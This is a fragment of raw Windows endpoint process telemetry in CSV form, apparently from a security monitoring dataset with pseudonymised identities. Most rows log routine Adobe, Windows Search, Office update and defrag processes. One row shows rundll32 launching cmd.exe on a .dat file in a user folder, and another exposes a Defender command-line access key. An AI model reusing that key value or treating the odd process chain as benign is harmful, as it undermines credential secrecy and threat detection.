01:00:55.046869700+00:00,f786175a-5bd5-4a5e-961e-264498fd8ef7,computerpii_0a470890c60768167990033d701e7bd881398861,155984,False,10.7740.19041.1052,False,11540474045172018,,11540474045172021,2021-06-23 01:00:03.302818800+00:00,14192,2021-06-23 01:00:03.302818800+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\Adobe Genuine Launcher.exe,14192,128,TerminateProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,323272,2021-02-17 03:19:42+00:00,2021-02-16 19:38:26+00:00,2021-06-23 00:53:47.468786+00:00,2020-09-22 19:30:00+00:00,2176,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,0.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",AdobeGCClient,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,AdobeGCClientLauncher,AdobeGCClientLauncher.exe,Adobe Genuine Launch Utility,"Adobe Systems, Incorporated",AdobeGCClient,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,AdobeGCClient,AdobeGCClient.exe,Adobe GC Client Application
+1160,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:00:20.811177+00:00,15960,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320629_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320629 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon""  ""1""",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:21.105337700+00:00,2021-06-23 01:00:55.047206600+00:00,55523842-9505-4096-b4e8-634f2f1bc5b2,computerpii_0a470890c60768167990033d701e7bd881398861,155994,False,10.7740.19041.1052,False,11540474045144190,,11540474045172023,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,\Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe,4660,128,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,20480.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
+1161,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 02:08:39.739063700+00:00,18332,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 02:08:39.725023500+00:00,388,cmd.exe,cmd.exe C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\mr.dat,False,2021-06-24 01:01:01.746618400+00:00,13732,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 02:08:40.096703300+00:00,2021-06-24 02:09:03.899545800+00:00,f83b9640-bb71-4e6d-a760-3079d95ab728,computerpii_0a470890c60768167990033d701e7bd881398861,173007,False,10.7740.19041.1052,False,11540474045175932,,11540474045175933,2021-06-24 02:08:39.725023500+00:00,388,2021-06-24 02:08:39.725023500+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,388,128,ActiveProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-24 01:10:55.210484500+00:00,2021-02-17 04:34:58.875918800+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,0.0,1.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1162,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 08:34:26.481175500+00:00,16816,OfficeC2RClient.exe,"""OfficeC2RClient.exe"" /frequentupdate SCHEDULEDTASK displaylevel=False",PortableExecutable,2021-06-12 08:56:59.029539+00:00,C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe,23080816,0dc113fc1d718e1951bb9c59f2ac9547,1c8f95ff4650c68fffc16576e905462a6b8e1b965156073701c8ab7732a06367,78627ab451d9269178de0c336d68bdb14475501b,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 08:34:26.511612600+00:00,2021-06-24 08:36:36.483151400+00:00,3ed22b12-3958-4c8c-9d03-1d309c485f32,computerpii_0a470890c60768167990033d701e7bd881398861,177652,False,10.7740.19041.1052,False,11540474045136925,,11540474045177362,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft Office,16.0.13801.20688,OfficeC2RClient.exe,OfficeC2RClient.exe,Microsoft Office Click-to-Run Client
+1163,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 08:34:27.457599100+00:00,13832,Defrag.exe,defrag.exe -c -h -o -$,PortableExecutable,2021-02-17 04:35:36.620080800+00:00,C:\Windows\System32\Defrag.exe,210432,e2601e315e9a9837279a23963f5819b0,7a18dbbe6ca138389424a7b2c0135ba4a7541c33e0443227f3cf505b58b52a85,5bb7fdaf33e556323a1152d36b0f9159cc53d291,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 08:34:27.854822900+00:00,2021-06-24 08:36:36.483473100+00:00,535a2742-ae9e-4f17-aca7-6b0da6f35f76,computerpii_0a470890c60768167990033d701e7bd881398861,177658,False,10.7740.19041.1052,False,11540474045136925,,11540474045177365,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,18560,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corp.,Windows Drive Optimizer,10.0.19041.746,Defrag.EXE,Defrag.EXE,Disk Defragmenter Module
+1164,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 08:34:27.465037400+00:00,10512,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,e2601e315e9a9837279a23963f5819b0,7a18dbbe6ca138389424a7b2c0135ba4a7541c33e0443227f3cf505b58b52a85,5bb7fdaf33e556323a1152d36b0f9159cc53d291,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 08:34:27.457599100+00:00,13832,Defrag.exe,defrag.exe -c -h -o -$,True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 08:34:27.855076900+00:00,2021-06-24 08:36:36.483520200+00:00,4b399655-d440-49e2-b26b-b3ca9e31b296,computerpii_0a470890c60768167990033d701e7bd881398861,177659,False,10.7740.19041.1052,False,11540474045177365,,11540474045177366,2021-06-24 08:34:27.457599100+00:00,13832,2021-06-24 08:34:27.457599100+00:00,\Device\HarddiskVolume3\Windows\System32\Defrag.exe,13832,18560,TerminateProcessStartkey,C:\Windows\System32,210432,2034-09-24 09:30:42+00:00,2021-02-17 04:35:36.622740100+00:00,2021-06-24 08:34:27.465943200+00:00,2021-02-17 04:35:36.620080800+00:00,18560,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corp.,Windows Drive Optimizer,10.0.19041.746,Defrag.EXE,Defrag.EXE,Disk Defragmenter Module,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1165,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 08:34:57.474318900+00:00,20776,schtasks.exe,"schtasks.exe /change /tn ""Microsoft\Office\Office ClickToRun Service Monitor"" /enable",PortableExecutable,2021-04-14 01:10:22.921960600+00:00,C:\Windows\System32\schtasks.exe,235008,796b784e98008854c27f4b18d287ba30,356280cca63ca5e887fdbe5cb4105a53341fbac9219efc51621df9ba8ee9838b,681170294f5709db976f9bd6e8c84f3537845a01,8c173d41112b95da7849df7131f8a969,f0def25047f6fa07dc371fb4c9ddcb94a5419f109d08c349e897d4ae484872a0,d499a4fd8fa4f197f0d15ae8bdeb259ee77c14f5,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:57:41.418706+00:00,7732,OfficeClickToRun.exe,"""OfficeClickToRun.exe"" /service",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 08:34:57.558767400+00:00,2021-06-24 08:36:36.483926100+00:00,7a99d854-dc92-45bc-aa34-89c38fdfbdee,computerpii_0a470890c60768167990033d701e7bd881398861,177665,False,10.7740.19041.1052,False,11540474045144114,,11540474045177371,2021-06-12 08:57:41.418706+00:00,7732,2021-06-12 08:57:41.418706+00:00,\Device\HarddiskVolume3\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe,7732,18560,ActiveProcessStartkey,C:\Program Files\Common Files\microsoft shared\ClickToRun,8689024,2021-05-25 00:49:08+00:00,2021-06-02 10:25:12+00:00,2021-06-12 08:57:41.423817800+00:00,2021-06-12 08:56:59.204972600+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Office,16.0.13801.20688,OfficeClickToRun.exe,OfficeClickToRun.exe,Microsoft Office Click-to-Run (SxS),Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,schtasks.exe,schtasks.exe,Task Scheduler Configuration Tool
+1166,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 08:34:57.485387500+00:00,13424,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,796b784e98008854c27f4b18d287ba30,356280cca63ca5e887fdbe5cb4105a53341fbac9219efc51621df9ba8ee9838b,681170294f5709db976f9bd6e8c84f3537845a01,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 08:34:57.474318900+00:00,20776,schtasks.exe,"schtasks.exe /change /tn ""Microsoft\Office\Office ClickToRun Service Monitor"" /enable",True,2021-06-12 08:57:41.418706+00:00,7732,\Device\HarddiskVolume3\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 08:34:57.559986900+00:00,2021-06-24 08:36:36.483984200+00:00,833d6129-2fb2-490d-8e68-096b855e4692,computerpii_0a470890c60768167990033d701e7bd881398861,177666,False,10.7740.19041.1052,False,11540474045177371,,11540474045177372,2021-06-24 08:34:57.474318900+00:00,20776,2021-06-24 08:34:57.474318900+00:00,\Device\HarddiskVolume3\Windows\System32\schtasks.exe,20776,18560,TerminateProcessStartkey,C:\Windows\System32,235008,2088-09-09 15:45:01+00:00,2021-04-14 01:10:22.927701200+00:00,2021-06-24 08:34:57.525318900+00:00,2021-04-14 01:10:22.921960600+00:00,18560,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,schtasks.exe,schtasks.exe,Task Scheduler Configuration Tool,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1167,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 08:34:57.520025500+00:00,17688,schtasks.exe,"schtasks.exe /change /tn ""Microsoft\Office\Office Automatic Updates"" /enable",PortableExecutable,2021-04-14 01:10:22.921960600+00:00,C:\Windows\System32\schtasks.exe,235008,796b784e98008854c27f4b18d287ba30,356280cca63ca5e887fdbe5cb4105a53341fbac9219efc51621df9ba8ee9838b,681170294f5709db976f9bd6e8c84f3537845a01,8c173d41112b95da7849df7131f8a969,f0def25047f6fa07dc371fb4c9ddcb94a5419f109d08c349e897d4ae484872a0,d499a4fd8fa4f197f0d15ae8bdeb259ee77c14f5,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:57:41.418706+00:00,7732,OfficeClickToRun.exe,"""OfficeClickToRun.exe"" /service",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 08:34:57.562420100+00:00,2021-06-24 08:36:36.484041200+00:00,59b3bdac-2a87-4e34-abce-73f787769b4e,computerpii_0a470890c60768167990033d701e7bd881398861,177667,False,10.7740.19041.1052,False,11540474045144114,,11540474045177373,2021-06-12 08:57:41.418706+00:00,7732,2021-06-12 08:57:41.418706+00:00,\Device\HarddiskVolume3\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe,7732,18560,ActiveProcessStartkey,C:\Program Files\Common Files\microsoft shared\ClickToRun,8689024,2021-05-25 00:49:08+00:00,2021-06-02 10:25:12+00:00,2021-06-12 08:57:41.423817800+00:00,2021-06-12 08:56:59.204972600+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Office,16.0.13801.20688,OfficeClickToRun.exe,OfficeClickToRun.exe,Microsoft Office Click-to-Run (SxS),Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,schtasks.exe,schtasks.exe,Task Scheduler Configuration Tool
+1168,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 08:34:57.525232900+00:00,11548,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,796b784e98008854c27f4b18d287ba30,356280cca63ca5e887fdbe5cb4105a53341fbac9219efc51621df9ba8ee9838b,681170294f5709db976f9bd6e8c84f3537845a01,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 08:34:57.520025500+00:00,17688,schtasks.exe,"schtasks.exe /change /tn ""Microsoft\Office\Office Automatic Updates"" /enable",True,2021-06-12 08:57:41.418706+00:00,7732,\Device\HarddiskVolume3\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 08:34:57.562604800+00:00,2021-06-24 08:36:36.484096+00:00,2e764b0b-7cd3-458d-9f39-5b30e027ce2e,computerpii_0a470890c60768167990033d701e7bd881398861,177668,False,10.7740.19041.1052,False,11540474045177373,,11540474045177374,2021-06-24 08:34:57.520025500+00:00,17688,2021-06-24 08:34:57.520025500+00:00,\Device\HarddiskVolume3\Windows\System32\schtasks.exe,17688,18560,TerminateProcessStartkey,C:\Windows\System32,235008,2088-09-09 15:45:01+00:00,2021-04-14 01:10:22.927701200+00:00,2021-06-24 08:34:57.525318900+00:00,2021-04-14 01:10:22.921960600+00:00,18560,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,schtasks.exe,schtasks.exe,Task Scheduler Configuration Tool,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1169,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 08:34:57.555289200+00:00,17700,schtasks.exe,"schtasks.exe /change /tn ""Microsoft\Office\Office Automatic Updates 2.0"" /enable",PortableExecutable,2021-04-14 01:10:22.921960600+00:00,C:\Windows\System32\schtasks.exe,235008,796b784e98008854c27f4b18d287ba30,356280cca63ca5e887fdbe5cb4105a53341fbac9219efc51621df9ba8ee9838b,681170294f5709db976f9bd6e8c84f3537845a01,8c173d41112b95da7849df7131f8a969,f0def25047f6fa07dc371fb4c9ddcb94a5419f109d08c349e897d4ae484872a0,d499a4fd8fa4f197f0d15ae8bdeb259ee77c14f5,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:57:41.418706+00:00,7732,OfficeClickToRun.exe,"""OfficeClickToRun.exe"" /service",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 08:34:58.163949400+00:00,2021-06-24 08:36:36.484442800+00:00,96ef62af-5578-4efd-8d10-aad8804a3419,computerpii_0a470890c60768167990033d701e7bd881398861,177675,False,10.7740.19041.1052,False,11540474045144114,,11540474045177375,2021-06-12 08:57:41.418706+00:00,7732,2021-06-12 08:57:41.418706+00:00,\Device\HarddiskVolume3\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe,7732,18560,ActiveProcessStartkey,C:\Program Files\Common Files\microsoft shared\ClickToRun,8689024,2021-05-25 00:49:08+00:00,2021-06-02 10:25:12+00:00,2021-06-12 08:57:41.423817800+00:00,2021-06-12 08:56:59.204972600+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Office,16.0.13801.20688,OfficeClickToRun.exe,OfficeClickToRun.exe,Microsoft Office Click-to-Run (SxS),Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,schtasks.exe,schtasks.exe,Task Scheduler Configuration Tool
+1170,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 08:34:57.561432600+00:00,8072,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,796b784e98008854c27f4b18d287ba30,356280cca63ca5e887fdbe5cb4105a53341fbac9219efc51621df9ba8ee9838b,681170294f5709db976f9bd6e8c84f3537845a01,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 08:34:57.555289200+00:00,17700,schtasks.exe,"schtasks.exe /change /tn ""Microsoft\Office\Office Automatic Updates 2.0"" /enable",True,2021-06-12 08:57:41.418706+00:00,7732,\Device\HarddiskVolume3\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 08:34:58.165985600+00:00,2021-06-24 08:36:36.484489300+00:00,9e1fa2f9-e7ac-4b4c-9822-292b90ca4f5c,computerpii_0a470890c60768167990033d701e7bd881398861,177676,False,10.7740.19041.1052,False,11540474045177375,,11540474045177376,2021-06-24 08:34:57.555289200+00:00,17700,2021-06-24 08:34:57.555289200+00:00,\Device\HarddiskVolume3\Windows\System32\schtasks.exe,17700,18560,TerminateProcessStartkey,C:\Windows\System32,235008,2088-09-09 15:45:01+00:00,2021-04-14 01:10:22.927701200+00:00,2021-06-24 08:34:57.525318900+00:00,2021-04-14 01:10:22.921960600+00:00,18560,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,schtasks.exe,schtasks.exe,Task Scheduler Configuration Tool,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1171,True,System,S-1-5-20,NETWORK SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 02:40:16.420773300+00:00,6300,MpCmdRun.exe,"""MpCmdRun.exe"" GetDeviceTicket -AccessKey 90FB52A9-5262-5B42-FDCC-0B17D2737845 ",PortableExecutable,2021-06-14 00:56:51.807361100+00:00,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,644888,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,cecd78f3ee9d8d5cdb381f3c60ae8b1a,404d8d6ac0005cd7b57aa779ff7aca223c27cef4820c94de0a39c21604d4652b,f70eca243b0409cea2f8f642274cc13f23a22a25,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-14 00:56:58.859290200+00:00,2848,MsMpEng.exe,"""MsMpEng.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 02:40:17.025801700+00:00,2021-06-25 02:41:58.610976100+00:00,d2503803-7ebf-4694-8c28-0d6a023a5cc2,computerpii_0a470890c60768167990033d701e7bd881398861,185728,False,10.7740.19041.1052,False,11540474045145394,,11540474045179130,2021-06-14 00:56:58.859290200+00:00,2848,2021-06-14 00:56:58.859290200+00:00,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MsMpEng.exe,2848,18560,ActiveProcessStartkey,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0,136656,1998-01-06 16:00:45+00:00,2021-06-14 00:56:50.126000+00:00,2021-06-14 00:56:58.853571700+00:00,2021-06-14 00:56:51.807361100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,996,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MsMpEng.exe,MsMpEng.exe,Antimalware Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility
